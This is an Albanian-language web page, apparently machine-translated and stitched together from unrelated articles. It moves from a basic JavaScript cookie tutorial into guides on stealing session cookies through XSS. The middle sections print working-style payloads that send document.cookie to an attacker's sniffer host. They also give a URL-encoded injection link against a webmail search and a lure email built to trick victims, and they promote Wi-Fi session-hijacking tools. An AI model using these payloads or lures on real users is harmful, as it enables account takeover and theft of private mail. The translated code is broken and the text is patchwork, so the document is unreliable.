Metodat për vjedhjen e biskotave. Si të nxjerrim një fjalëkalim nga një cookie Për çfarë shërbejnë?


JavaScript bën të mundur vendosjen dhe leximin e cookies në shfletues. Në këtë mësim do të shikojmë se si të punojmë me cookies, dhe gjithashtu do të krijojmë një faqe të thjeshtë që do të kujtojë emrin e futur dhe do ta shfaqë atë sa herë që identifikoheni.

Çfarë janë cookies?

Cookies janë një sasi e vogël e të dhënave që ruhen nga një shfletues ueb. Ato ju lejojnë të ruani informacione të caktuara rreth përdoruesit dhe t'i rikuperoni sa herë që ai viziton faqen tuaj. Çdo përdorues ka grupin e tij unik të cookie-ve.

Në mënyrë tipike, cookies përdoren nga serveri në internet për të kryer funksione të tilla si gjurmimi i vizitave në sajt, regjistrimi në sajt dhe ruajtja e informacionit rreth porosive ose blerjeve. Megjithatë, ne nuk kemi nevojë të shpikim një program të serverit në ueb për të përdorur cookies. Ne mund t'i përdorim ato duke përdorur JavaScript.

Vetia dokumenti.cookie.

Në JavaScript, cookie-t aksesohen duke përdorur vetinë e cookie-t të objektit të dokumentit. Ju mund të krijoni cookie si më poshtë:

Dhe merrni të gjithë grupin e ruajtur të cookie-ve si kjo:

Var x = dokument.cookie;

Le të shohim më në detaje ruajtjen dhe marrjen e cookies.

Ruajtja e cookies

Për të ruajtur një cookie, duhet të caktojmë document.cookie në një varg teksti që përmban vetitë e cookie-t që duam të krijojmë:

dokument.cookie = "emri = vlera; skadon = data; shteg = shteg; domen = domen; i sigurt";

Karakteristikat janë përshkruar në tabelë:

Shembull i përshkrimit të pronës
emër = vlerë Vendos emrin e cookie-t dhe vlerën e tij. emri i përdoruesit=Vasya
skadon = datë Përcakton datën e skadimit për cookie-t. Data duhet të jetë në formatin që kthehet nga metoda e objektit Date toGMTString(). Nëse skadimi nuk është specifikuar, cookie-ja do të fshihet kur shfletuesi të mbyllet. skadon=
13/06/2003 00:00:00
shteg= shteg Ky opsion cakton shtegun në sajtin brenda të cilit cookie-ja është e vlefshme. Vetëm dokumentet nga shtegu i specifikuar mund të marrin vlerën e cookie-t. Zakonisht kjo veti lihet bosh, që do të thotë se vetëm dokumenti që vendos cookie-t mund t'i qaset. rrugë=/demo/
domain=domain Ky opsion cakton domenin brenda të cilit funksionon cookie. Vetëm sajtet nga domeni i specifikuar mund të marrin vlerën e cookie-t. Zakonisht kjo veti lihet bosh, që do të thotë se vetëm domeni që vendos cookie-t mund t'i qaset. domain=faqe interneti
të sigurt Ky opsion i thotë shfletuesit të përdorë SSL për të dërguar cookie në server. Përdoret shumë rrallë. të sigurt

Le të shohim një shembull të vendosjes së cookies:

document.cookie = "emri i përdoruesit=Vasya; skadon=02/15/2011 00:00:00";

Ky kod vendos cookie-n e emrit të përdoruesit dhe i cakton vlerën "Vasya", e cila do të ruhet deri më 15 shkurt 2011 (përdoret formati i kohës evropiane!).

var cookie_date = data e re (2003, 01, 15); dokument.cookie = "emri i përdoruesit=Vasya; skadon=" + data_cookie.toGMTString();

Ky kod bën saktësisht të njëjtën gjë si shembulli i mëparshëm, por përdor metodën Date.toGMTString() për të vendosur datën. Ju lutemi vini re se numërimi i muajit në objektin Date fillon nga 0, domethënë shkurti është 01.

Document.cookie = "logged_in=po";

Ky kod vendos cookie-n loged_in dhe e vendos atë në "po". Meqenëse atributi expires nuk është caktuar, cookie-ja do të fshihet kur shfletuesi të mbyllet.

var cookie_date = data e re(); // Data dhe ora aktuale cookie_date.setTime (cookie_date.getTime() - 1); dokument.cookie = "logged_in=; skadon=" + data_cookie.toGMTString();

Ky kod vendos cookie-n loged_in dhe vendos vargun e ruajtjes në kohën një sekondë përpara orës aktuale - ky operacion do ta fshijë menjëherë skedarin e skedarit. Mënyra manuale për të fshirë cookies!

Rikodimi i vlerës së cookie-t!

Vlera e cookie-t duhet të rikodohet për të ruajtur dhe shfaqur saktë karakteret si hapësira dhe dy pika. Ky operacion siguron që shfletuesi të interpretojë saktë vlerën. Rikodimi Lego kryhet nga funksioni escape() JavaScript. Për shembull:

document.cookie = "username=" + escape("Vasya Pupkin") + "; expires=02/15/2003 00:00:00"; Funksioni për vendosjen e cookies

Vendosja e cookies do të jetë më e lehtë nëse shkruajmë një funksion të veçantë që do të kryejë operacione të thjeshta si rikodimi i vlerave dhe ndërtimi i vargut dokument.cookie. Për shembull:

Funksioni set_cookie (emri, vlera, exp_y, exp_m, exp_d, shteg, domen, i sigurt) ( var cookie_string = emri + "=" + escape (vlera); nëse (exp_y) ( var skadon = data e re (exp_y, exp_m, exp_d String_cookie += "; skadon" + skadon.toGMTString () if (rruga) cookie_string += "; path=" + escape (rruga) cookie_= "; domain=" + escape (domeni nëse (i sigurt) kuki_string += "; sigurt";

Funksioni merr të dhënat e cookie-t si argumente, më pas ndërton vargun e duhur dhe vendos cookie-n.

Për shembull, vendosja e kukive pa një datë skadimi:

set_cookie ("emri i përdoruesit", "Vasya Pupkin"); set_cookie ("emri i përdoruesit", "Vasya Pupkin", 2011, 01, 15);

Vendosja e kukive me një periudhë ruajtjeje, domenin e sajtit, duke përdorur SSL, por pa një shteg:

set_cookie ("emri i përdoruesit", "Vasya Pupkin", 2003, 01, 15, "", "faqe", "i sigurt"); Funksioni për fshirjen e cookies.

Një tjetër funksion i dobishëm për të punuar me cookies është paraqitur më poshtë. Funksioni "fshin" cookies nga shfletuesi duke vendosur datën e skadimit në një sekondë më herët se vlera aktuale e kohës.

funksioni delete_cookie (emri_cookie) ( var cookie_date = data e re (); // Data dhe ora aktuale cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = cookie_name += "=; skadon=" + data_cookie.toGMTString ();

Për të përdorur këtë funksion, duhet t'i jepni vetëm emrin e cookie-t që do të fshihet:

Delete_cookie ("emri i përdoruesit");

Marrja e vlerës së cookie-t

Për të marrë vlerën e një cookie të paracaktuar për dokumentin aktual, duhet të përdorni veçorinë document.cookie:

Var x = dokument.cookie;

Kjo kthen një varg që përbëhet nga një listë çiftesh emri/vlerash të ndara me pikëpresje për të gjithë cookies që janë të vlefshme për dokumentin aktual. Për shembull:

"emri i përdoruesit=Vasya; fjalëkalimi=abc123"

Në këtë shembull, ka 2 cookie që janë vendosur paraprakisht: emri i përdoruesit, i cili ka vlerën "Vasya" dhe fjalëkalimi, i cili ka vlerën "abc123".

Funksioni për të marrë vlerën e cookie-t

Në mënyrë tipike, na duhet vetëm vlera e një cookie në të njëjtën kohë. Prandaj, vargu i biskotave nuk është i përshtatshëm për t'u përdorur! Këtu është një funksion që përpunon vargun document.cookies, duke kthyer vetëm skedarët e skedarëve që janë me interes në një moment të caktuar:

Funksioni get_cookie (emri_cookie) ( rezultatet var = document.cookie.match ("(^|;) ?" + emri_cookie + "=([^;]*)(;|$)"); nëse (rezultatet) kthehen (unescape (rezultatet));

Ky funksion përdor një shprehje të rregullt për të gjetur emrin e cookie-t që është me interes, dhe më pas kthen vlerën, e cila përpunohet nga funksioni unescape() për ta ri-koduar atë në formën normale të karaktereve. (Nëse cookie nuk gjendet, null kthehet.)

Kjo veçori është e lehtë për t'u përdorur. Për shembull, për të kthyer vlerën e cookie-t të emrit të përdoruesit:

Var x = get_cookie ("emri i përdoruesit");

Shembull i thjeshtë përdorimi

Në këtë shembull, ne krijuam një faqe që kërkon emrin tuaj në vizitën tuaj të parë, më pas ajo ruan emrin tuaj në një cookie dhe e shfaq atë në vizitat pasuese.

Hapni faqen në një dritare të re. Në vizitën tuaj të parë, do t'ju kërkojë të shkruani emrin tuaj dhe ta ruani atë në një cookie. Nëse e vizitoni sërish faqen, ajo do të shfaqë emrin e cookie-t që keni futur në ekran.

Për cookies, ne kemi vendosur periudhën e ruajtjes në 1 vit nga data aktuale, kjo do të thotë se shfletuesi do të ruajë emrin tuaj edhe nëse e mbyllni.

Ju mund ta shikoni kodin e faqes në shfletuesin tuaj duke zgjedhur opsionin Shiko Burimin. Këtu është pjesa kryesore e kodit:

if (! get_cookie ("emri i përdoruesit")) ( var emri i përdoruesit = kërkesë ("Ju lutemi shkruani emrin tuaj", ""); nëse (emri i përdoruesit) ( var aktual_date = data e re; var cookie_year = aktual_date.getFullYear () + 1; var cookie_month = data_current.getMonth( var cookie_day = aktual_date.getDate("emri_përdorues", emri i përdoruesit, cookie_muaj, cookie_day) ) else(var emri i përdoruesit = get_cookie ("përshëndetje"); , " + emri i përdoruesit + ", mirë se erdhe në faqe!"); document.write("
Me harro!"); }

Ky mësim ju tregoi se si të përdorni cookies në JavaScript për të ruajtur informacione rreth vizitorëve tuaj. Faleminderit per vemendjen! :)

Në të cilin u propozua të marrë pjesë në një ngjarje falas kushtuar çështjeve të sigurisë së informacionit. Meqenëse ngjarja u mbajt në qytetin tim, vendosa që patjetër të shkoja atje. Mësimi i parë iu kushtua dobësive në faqet e internetit të tilla si XSS. Pas mësimit, vendosa që më duhej të konsolidoja njohuritë e marra në kushte reale. Zgjodha disa site që lidhen me qytetin tim dhe fillova të përpiqem të fus skenarin tim në të gjitha format. Në shumicën e rasteve skenari ishte filtruar. Por ndodhi që u aktivizua "alarmi" dhe u shfaq mesazhi im. I raportova dobësinë e gjetur te administratorët dhe ata rregulluan shpejt gjithçka.

Në një nga këto ditë, ndërsa kontrolloja postën më të fundit në mail.ru, më ra në sy një formular për kërkimin e letrave në kutinë postare. Herë pas here e përdorja këtë kërkim për të gjetur diçka që më duhej në një grumbull letrash të mia të vjetra. Epo, meqenëse në dy ditët e fundit e kam futur "alarmin" tim pothuajse kudo që kam mundur, dora ime në mënyrë refleksive e kapi këtë formular kërkimi. Shkrova kodin për skriptin tim dhe shtypa Enter. Imagjinoni habinë time kur pashë një mesazh të njohur me dhimbje në ekran...


Në leksionin e Open InfoSec Days, folësi tha se programuesit janë mjaft skeptikë në lidhje me dobësitë e këtij lloji, duke thënë: “Alert? Epo, çfarë? Kjo nuk është e rrezikshme”. Nëse në faqet e tjera u kënaqa vetëm me këtë dritare me mesazhin tim, atëherë në këtë rast vendosa të shkoj më tej dhe të tregoj se çfarë mund të dalë nga një "alarm" i tillë.

Pra, skenari funksionon, që do të thotë se ka një cenueshmëri. Prandaj, mund të provoni të ekzekutoni ndonjë skript tjetër. Për shembull, një skript që na dërgon cookie-t e një përdoruesi tjetër. Që skripti të funksionojë, duhet ta detyrojmë përdoruesin të ekzekutojë skriptin tonë. Kjo mund të bëhet duke i dërguar atij një letër me lidhjen e duhur, pasi të klikoni mbi të cilën do të kërkohet kutia postare dhe do të ekzekutohet kodi që na nevojitet.

U desh pak kohë dhe shumë eksperimente për të kuptuar mekanikën e cenueshmërisë. Ndonjëherë skenari funksiononte, herë filtrohej. Pas disa përpjekjesh, u përcaktua në mënyrë empirike që skenari funksionon 100% vetëm nëse kërkimi i shkronjave jep një rezultat pozitiv. Kjo do të thotë, kur një përdorues kryen një kërkim me skriptin tonë, është e nevojshme që të paktën një shkronjë në kutinë e tij postare të gjendet sipas parametrave të specifikuar. Nuk është e vështirë ta rregullosh këtë.

Gjithashtu, në vend të një "alarm", ne kemi nevojë për një skript që do të transferojë cookies në sniffer tonë. Ne do ta shkruajmë këtë skript në një skedar të veçantë dhe do ta ngarkojmë në kërkimin tonë. Krijova një skedar test.js me kodin e nevojshëm dhe e ngarkova në host. Kodi i skriptit është si ky:

Img=Imazhi i ri();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
funksioni F() (
vendndodhje = "http://www.solife.ru";
}
setTimeout (F, 5000);

Çfarë do të doja të sqaroja këtu. Le të vendosemi në vendin e sulmuesit. Ne kemi nevojë që përdoruesi të klikojë në lidhje. Si mund ta detyroj atë ta bëjë këtë? Ju mund të premtoni male prej ari dhe për t'i marrë ato duhet të ndiqni lidhjen tonë në faqen. Por nuk mendoj se do të funksionojë. Njerëzit nuk bien më për këtë (unë vetë fshij vazhdimisht letra të tilla pa i lexuar). Prandaj, do të luajmë me keqardhjen njerëzore, pasi ajo ekziston ende në natyrë. Ju kërkojmë të votoni në faqen për shpëtimin e kafshëve të rrezikuara. Fillimisht, ne do të marrim cookie-t dhe më pas do ta ridrejtojmë përdoruesin në faqen e votimit. Koha e ridrejtimit u caktua në 5 sekonda, përndryshe cookie-t thjesht nuk kishin kohë për t'u transferuar në sniffer dhe përdoruesi u ridrejtua menjëherë në një faqe në lidhje me kafshët. Në vend të një "alarmi" përdora skriptin e mëposhtëm:

Kur mbarova me skenarët, fillova të shkruaj letrën. Më doli diçka si kjo:


Doli mjaft cinike, por u përpoqa t'i afroja kushtet sa më afër realitetit. Në fund të letrës ka një rresht me një shkrim, kjo është në mënyrë që letra jonë të gjendet kur të bëjmë një kërkim. Që linja të mos ngre pyetje të panevojshme, e lyeja me të bardhë. Unë gjithashtu vendos një hapësirë ​​në fjalën "http" në mënyrë që vargu të mos njihet dhe të shndërrohet në një lidhje. Përndryshe, përkundër faktit se linja e skriptit është e shkruar me font të bardhë, lidhja do të theksohej me blu nga marrësi, dhe ne nuk kemi nevojë për këtë. Kërkimi inteligjent do të vazhdojë të gjejë dhe njohë këtë varg, pavarësisht nga hapësirat.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

Kam përdorur kodimin URL për skriptin në mënyrë që asgjë të mos filtrohet. Shtova edhe parametrin “q_folder=0” për kërkim, në mënyrë që kërkimi të ndodhë në dosjen “Inbox”.

Letra është gati, e dërgojmë. Kam përdorur kutinë time të dytë postare në të njëjtin shërbim si marrësi. Le të shohim se çfarë erdhi në kutinë tjetër.

Teksti ynë i skenarit nuk është i dukshëm sepse përzihet në sfond. Le të klikojmë në lidhjen dhe të shohim se çfarë ndodh. Përdoruesi zhvendoset në rezultatet e kërkimit për email bazuar në parametrin që kemi specifikuar. Letra jonë që dërguam është e dukshme në rezultatet e kërkimit. Në këtë kohë, skripti ynë tashmë ka funksionuar dhe ka dërguar kukit e përdoruesit te sniffer. Pas 5 sekondash (koha varet nga cilësimet e skriptit), përdoruesi ridrejtohet në sitin e votimit.

Unë kontrolloj skedarin tim sniff.txt:

Meqenëse qëllimi im nuk është të vjedh kutitë e njerëzve të tjerë ose të fitoj akses në to, do ta mbyll historinë këtu. Por teorikisht, ju mund të zëvendësoni cookie-t tuaja me të dikujt tjetër dhe të fitoni akses në kutinë postare të dikujt tjetër. Në përgjithësi, nëse një sulmues është i interesuar për një objektiv, ai do të gjejë një përdorim për informacionin e marrë.

Unë dua të falënderoj Sergei Belov (

Një miku im harroi fjalëkalimin e një faqeje. Megjithatë, ai kishte kontrolluar më parë kutinë e zgjedhjes "Më kujto" në shfletuesin Google Chrome kur hynte, gjë që e lejoi atë të hynte në sajtin nën llogarinë e tij. Më erdhi një pyetje nëse është e mundur të transferohet kjo gjendje magjike në një kompjuter tjetër. Sigurisht, do të ishte më korrekte të ndryshoja ose rivendosja fjalëkalimin, por shoku im nuk mund ta bënte këtë për arsye që nuk lidhen me rastin.

Si të përdorni intercepter-ng për dummies

Pavarësisht nga shumëllojshmëria e softuerit modern për të zgjedhur, është e vështirë të gjesh programe më të mira hakerimi për Android sesa intercepter ng. Kriteri i parë që tregon në favor të këtij produkti është performanca e tij aktuale. Shumica e sniferëve të ofruara në rrjet janë thjesht imitime që nuk kryejnë funksionet e tyre të deklaruara.

Faktorët e ardhshëm pozitivë janë shkathtësia e aplikacionit dhe mbulimi i një audiencë të gjerë përdoruesish.

Ndihmë kompjuterike 939-29-71

Le të fillojmë me radhë. Cookies ose "cookies" janë skedarë teksti shumë të vegjël - faqeshënues me informacion.

Ueb serveri e transmeton këtë informacion në shfletuesin e përdoruesit. ku ky informacion ruhet derisa të kërkohet. Jo shumë e qartë. Epo. Mirë.

Do të përpiqem ta bëj edhe më të thjeshtë. Shikoni. ju jeni regjistruar në ndonjë faqe interneti.

Në momentin e regjistrimit, krijohen të njëjtat "cookie".

Ja çfarë janë ata.

Cookie Cadger

Programi dëgjon trafikun në rrjetin WiFi, përgjon cookies dhe përsërit sesionin e përdoruesit në shfletuesin tuaj, duke përsëritur kërkesat me kredencialet e tij. Autori Matthew Sullivan dha një prezantim të programit më 30 shtator në konferencën e hakerëve Derbycon. Pikërisht gjatë fjalimit, Matthew Sullivan përgjoi një seancë të pasigurt me Google të një prej vizitorëve të konferencës nëpërmjet WiFi.

Si të vidhni biskota

Nëse, ndërsa jeni në një faqe uebsajti, futni tekstin e mëposhtëm në shiritin e adresave të shfletuesit tuaj Firefox ose Opera: javaсript:document.write(document.cookie); atëherë do të shihni diçka si: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixwall=0; remixInformacion=0; remixMembersBar=0; ripërshkrimi=0; remixautobookmark=8; remixemail=********; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Kujdes! .

Udhëzuesi i plotë për skriptimin në vend

XSS është një lloj dobësie softuerike vendase për aplikacionet e Uebit që lejon një sulmues të injektojë skriptet nga ana e klientit në faqet e internetit të shikuara nga përdoruesit e tjerë, Wikipedia e përkufizon XSS si më poshtë: “Skriptimi ndër-site (XSS) është një lloj dobësie softuerike vendase. në Web -aplikacione (duke anashkaluar kufizimet e sigurisë së shfletuesit)”, i cili lejon një sulmues të injektojë skriptin e klientit në faqet e internetit të shikuara nga përdoruesit e tjerë.

Dallimi midis cookies dhe sesioneve

Jo shumë kohë më parë shkrova një artikull se si të regjistrohen dhe autorizohen përdoruesit në një faqe interneti.

". Në këtë artikull unë do të zbërthej ndryshimi midis sesioneve dhe cookies. në mënyrë që më në fund të bëni zgjedhjen tuaj.

Biskota. Jo, nuk bëhet fjalë fare për biskota, ka të bëjë me sigurinë tuaj. Kështu që ju shkoni në faqen tuaj të preferuar "vkontakte" (ose, për shembull, shikoni postën) në kompjuterin e dikujt tjetër, refuzoni opsionin "ruaj fjalëkalimin", shikoni me kënaqësi postën dhe largohuni. Dhe mos mendoni për faktin se tani mund të hyni në një rrjet social ose email nën emrin tuaj.

Unë as nuk po e konsideroj situatën me një program që kujton fjalëkalimin pa dijeninë tuaj. Ky është tashmë një hak i qëllimshëm dhe me siguri do të dyshoni se diçka e tillë mund të ndodhë dhe nuk do të shkoni në faqen tuaj të preferuar në një kompjuter të tillë. Por mund të flasim për kuriozitet të thjeshtë njerëzor - ju po vizitonit miqtë, dhe pastaj papritmas ata marrin mundësinë të lexojnë postën tuaj. Jeni të sigurt se do ta refuzojnë këtë mundësi? Nuk keni frikë se do të dalë diçka? Në çdo rast, unë do të lë mënjanë pyetjet e moralit dhe do të flas vetëm se si ruhen informacionet në kompjuter që tani mund të lejoheni në ndonjë sajt pa kërkuar fjalëkalim.

si të vjedhësh Cookie

Dhe emri i kësaj teknologjie është cookies.

Dhe këtu filloi gjithçka. Protokolli http, përmes të cilit në të vërtetë shikoni faqet (përfshirë këtë), fillimisht nuk parashikonte mundësinë e mbajtjes së një lidhjeje. Kjo do të thotë, përafërsisht, ju dërgoni një kërkesë në faqe, merrni një përgjigje, ajo shfaqet në ekran dhe më pas serveri nuk mban mend asgjë për ju. Kjo, natyrisht, është e mirë kur faqja është thjesht informative dhe nuk duhet të kujtojë asgjë për ju, por ne jetojmë në epokën e Web 2.0 😉 Zhvillimi i natyrshëm i protokollit janë kërkesat POST dhe GET, kur dërgoni disa të dhëna, serveri mund ta shkruajë atë në të dhënat e bazës së të dhënave, por kjo nuk mjafton.

Le të shohim një shembull shumë të thjeshtë. Forum. Pra, ju u regjistruat, dhe ka një postim në forum që ka një përdorues të tillë me një fjalëkalim të tillë dhe disa të dhëna të tjera shtesë. Por tani ju shkoni në forum dhe hyni - shkruani fjalëkalimin tuaj. Diku duhet të ketë informacion se jeni të identifikuar. Në server? Sigurisht që jo! Është e pamundur të ruash informacionin në server që autorizimi është bërë nga kompjuteri juaj - nuk do të jetë në gjendje t'ju dallojë nga dikush tjetër (edhe adresa juaj IP nuk ju identifikon në mënyrë unike)! Kështu, informacioni që autorizimi ka ndodhur duhet të ruhet në kompjuterin tuaj. Për këtë janë cookies, për këtë janë krijuar.

Një cookie është një rekord i vogël në kompjuterin tuaj që ruan informacione rreth sajtit që keni vizituar. Kur hyni, krijohet një hyrje e ngjashme, pas së cilës mund të ecni nëpër forum dhe ai do t'ju njohë. Megjithatë, kjo tashmë do të ndodhë automatikisht - falë informacionit të ruajtur në cookie - kështu që pretendimi se jeni administratori kryesor i forumit nuk do të funksionojë ende duke anashkaluar kontrollin e fjalëkalimit.

Tani mund të kthehemi aty ku filloi ky artikull. Nëse keni hyrë diku pa ruajtur një fjalëkalim, mund të ndodhë që të krijohet një hyrje në kompjuter që tani ju lejon të regjistroheni në këtë burim me emrin tuaj pa autorizim. Një hyrje e tillë në vetvete do të bëhet e vjetëruar pas ca kohësh, por ju mund ta detyroni atë të pastrohet. Çdo shfletues e bën këtë ndryshe, unë do t'ju tregoj se si mund të bëhet kjo në Google Chrome tim të preferuar. Hapja e parametrave

Shkoni te skeda "të avancuara" dhe gjeni butonin "shfaq cookies".

Tani, sigurisht, ju mund të fshini të gjitha cookies, por kjo mund të shqetësojë pronarin e kompjuterit. Prandaj, për shembull, në fushën e sipërme mund të vendosni emrin e faqes që ju intereson

Më pas mund të pastroni vetëm skedarët e skedarëve që lidhen me këtë sajt. Mund ta provoni tek imja. Megjithatë, nëse hyni në forumin tim dhe më pas pastroni cookies, informacioni i hyrjes do të harrohet. Provoje!

komentet mundësuar nga

1. Çfarë është XSS?
Një dobësi XSS lejon që kodi arbitrar javascript të futet në trupin e një faqeje. Sulmi XSS ndryshon nga të tjerët (për shembull, injeksioni SQL ose injeksioni PHP) në atë që prek klientin, jo serverin.

si të vidhni biskota

Me ndihmën e tij nuk mund të shikoni tabelat e bazës së të dhënave, të ngarkoni një predhë, etj. Përdorimi më i zakonshëm i XSS është vjedhja e cookies.
Cookies janë një pjesë e vogël e të dhënave e krijuar nga një server në internet dhe e ruajtur në kompjuterin e përdoruesit si skedar. Në mënyrë tipike, cookies përdoren për të ruajtur llogaritë dhe, më shpesh, ato përmbajnë një fjalëkalim të koduar, hyrje dhe ID të sesionit (megjithëse jo gjithmonë)
XSS vjen në dy lloje, aktive dhe pasive.

XSS pasive kërkon pjesëmarrje të drejtpërdrejtë nga viktima, si p.sh. klikimi në një lidhje që përmban kodin javascript. Kur përdorni këtë lloj XSS, nuk mund të bëni pa SI (Inxhinieri Sociale)

Aktivi XSS nuk kërkon ndonjë pjesëmarrje nga viktima, gjithçka që duhet të bëjnë është të vizitojnë faqen që përmban XSS. XSS aktiv mund të jetë, për shembull, në mesazhe në forume, biseda, shtimi i lajmeve, etj.

2.Kërko për XSS
Në këtë paragraf do t'ju tregoj se si të gjeni xss

2.1.XSS pasive
Për të gjetur XSS pasiv, thjesht zëvendësoni alarmin('xss') në formularin e hyrjes, nëse skripti funksionoi dhe mesazhi "xss" shfaqet, atëherë cenueshmëria është e pranishme, nëse skripti nuk funksionoi, mund të provoni gjithashtu "> alert (), kjo është ndoshta cenueshmëria më e zakonshme xss Nëse as njëra dhe as tjetra skript nuk ka funksionuar, atëherë ka shumë të ngjarë që nuk ka dobësi.
Le të shohim një shembull.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
A e shihni formularin "kërkim"? futni ">alert()" atje dhe klikoni "gjeni"
Shfaqet një dritare me xss, që do të thotë se xss është e pranishme (Ndoshta deri në kohën kur të lexoni këtë artikull, ky xss tashmë do të jetë hequr)

2.2.XSS aktive
Css të tilla mund të jenë, për shembull, në fushat e profilit, kur shtohen lajme në titullin e lajmit dhe në vetë lajmet (më rrallë), në mesazhet në forume/dhoma bisedash/dhoma të ftuarve me html të aktivizuar. Gjithçka është e thjeshtë këtu, ne futim skriptin nga nënparagrafi i mëparshëm në fusha, dhe nëse mesazhi shfaqet në ekran, atëherë cenueshmëria është e pranishme.
Le të shohim xss në etiketat BB në forume.
Mund të provoni thjesht të futni kodin javascript në etiketë, për shembull si kjo:
javascript:alert('xss')
Disa etiketa kanë parametra, për shembull një etiketë ka parametra dynsrc dhe lowsrc, le të përpiqemi të zëvendësojmë kodin si ky:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
Nëse skenari funksionoi, xss është atje

3. Përdorimi i XSS për të vjedhur Cookies
Tani më e shijshmja))))
Për të vjedhur cookies, ne kemi nevojë për një sniffer në internet, mund të instaloni një lloj sniffer në hostin tuaj ose mund të përdorni një sniffer në internet, prej të cilit ka shumë tani.
Për të vjedhur cookies nëpërmjet XSS pasive, viktima duhet të ndjekë një lidhje helmuese. Për të vjedhur cookie, ne do të përdorim një skript tjetër në vend të alarmit ('xss'):
img = Imazhi i ri();


ne e zëvendësojmë skriptin në lidhje dhe e lëmë viktimën ta ndjekë atë, të shikojë regjistrin e nuhatësit dhe të gëzohet.
Le të shohim një shembull.
Le të marrim atë XSS në Rambler nga paragrafi i mëparshëm.
Fut
">
img = Imazhi i ri();
img.src = "adresa e imazhit sniffer"+document.cookie;

në formularin e kërkimit, klikoni "gjeni", shikoni shiritin e adresave dhe shihni:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Ne ia dërgojmë këtë lidhje viktimës dhe shijojmë cookies.
Duke parë një lidhje të tillë, viktima mund të dyshojë për diçka, kështu që këshillohet që të kodohet
">img = new Image();img.src = "adresa e imazhit sniffer"+document.cookie;
në URL Ose përdorni shërbime si http://tinyurl.com/
Le të kalojmë në XSS aktive, gjithçka është e thjeshtë këtu, në vend të alert() fusim img = new Image();img.src = "adresa e imazhit sniffer"+document.cookie;

Tani kemi biskota. Por çfarë të bëni me ta? Është e thjeshtë, ju duhet t'i zëvendësoni ato në vend të tuajat. Shfletuesi Opera ka një redaktues të integruar të kukive (vegla-> i avancuar-> menaxhim i kukive), ka një shtojcë për Firefox (nuk e mbaj mend si quhet, përdorni Google)
Kjo është e gjitha për momentin, ndoshta artikulli do të plotësohet

Opera hap menunë kryesore, shkoni te seksioni "Cilësimet" dhe zgjidhni rreshtin "Cilësimet e përgjithshme...". Ose thjesht mund të shtypni tastet kryesore CTRL + F12. Kjo do të hapë dritaren e cilësimeve të shfletuesit, ku në skedën "Advanced" duhet të klikoni në seksionin "Cookies" në panelin e majtë. Në të duhet të klikoni butonin "Menaxho Cookies".

Në Mozilla FireFox, hapni seksionin "Tools" në meny dhe zgjidhni "Cilësimet". Në dritaren e cilësimeve, duhet të shkoni te skeda "Privacy", të gjeni një buton atje që thotë "Shfaq Cookies..." dhe klikoni atë për të hyrë në listën e skedarëve të ruajtur nga shfletuesi. Ju mund t'i kërkoni dhe shikoni ato këtu.

Në Internet Explorer, zgjeroni seksionin "Tools" në meny dhe zgjidhni "Properties". Në dritaren e cilësimeve të vetive, shkoni te skeda "Të përgjithshme" dhe klikoni butonin "Opsionet" në seksionin "Historiku i shfletimit". Në këtë mënyrë, ju do të hapni një dritare tjetër (“Opsionet e skedarëve të përkohshëm”), në të cilën duhet të klikoni butonin “Shfaq skedarët”.

Klikoni titullin "Emri" në listën e përmbajtjeve të dosjes së ruajtjes së përkohshme të skedarëve të Internet Explorer që hapet - në këtë mënyrë ju mund të gruponi të gjithë skedarët e kukive në një bllok në një grumbull të përbashkët skedarësh heterogjenë. Këtu mund të gjeni skedarin që ju intereson dhe ta hapni atë në Notepad standard për shikim ose redaktim.

Në Google Chrome, klikoni ikonën e çelësit në këndin e sipërm të djathtë të dritares dhe zgjidhni Opsionet nga menyja. Shfletuesi do të hapë faqen "Cilësimet" dhe ju klikoni lidhjen "Avancuar" në panelin e tij të majtë dhe në faqen e cilësimeve të avancuara, klikoni butonin "Cilësimet e përmbajtjes". Kjo nuk është faqja e fundit në rrugën drejt cookies të ruajtura nga ky shfletues.

Klikoni butonin "Të gjitha cookies dhe të dhënat e faqes" në faqen tjetër dhe më në fund do të keni akses në listën e skedarëve të skedarëve.

Google Chrome ofron mundësinë për të kërkuar, parë dhe fshirë cookie-t.

Në shfletuesin Safari, klikoni ikonën e ingranazhit në këndin e sipërm të djathtë dhe zgjidhni "Cilësimet...". Në dritaren për ndryshimin e cilësimeve, duhet të shkoni te skeda "Siguria" për të klikuar butonin "Trego Cookies" atje. Safari ofron vetëm funksione për kërkimin dhe fshirjen e cookies, përmbajtja e këtyre skedarëve të përkohshëm mund të shihet vetëm pjesërisht.

Biskota- informacion në formën e një skedari teksti të ruajtur në kompjuterin e përdoruesit nga faqja e internetit. Përmban të dhëna vërtetimi (hyrje/fjalëkalim, ID, numrin e telefonit, adresën e kutisë postare), cilësimet e përdoruesit, statusin e aksesit. Ruhet në profilin e shfletuesit.

Hakerimi i biskotaveështë vjedhja (ose "rrëmbimi") i sesionit të vizitorëve të burimeve të internetit. Informacioni privat bëhet i disponueshëm jo vetëm për dërguesin dhe marrësin, por edhe për një palë të tretë - personin që ka kryer përgjimin.

Mjetet dhe teknikat e hakerimit të biskotave

Hajdutët e kompjuterave, si kolegët e tyre në jetën reale, përveç aftësive, shkathtësisë dhe njohurive, natyrisht, kanë edhe mjetet e tyre - një lloj arsenali i çelësave dhe sondave master. Le të hedhim një vështrim në truket më të njohura që përdorin hakerat për të nxjerrë cookie nga përdoruesit e internetit.

Sniffers

Programe speciale për monitorimin dhe analizimin e trafikut në rrjet. Emri i tyre vjen nga folja angleze “sniff” (sniff), sepse. fjalë për fjalë "të nuhasin" paketat e transmetuara midis nyjeve.

Por sulmuesit përdorin një sniffer për të përgjuar të dhënat e sesioneve, mesazhet dhe informacione të tjera konfidenciale. Objektivat e sulmeve të tyre janë kryesisht rrjete të pambrojtura, ku cookies dërgohen në një seancë të hapur HTTP, domethënë ato praktikisht nuk janë të koduara. (Wi-Fi publik është më i prekshmi në këtë drejtim.)

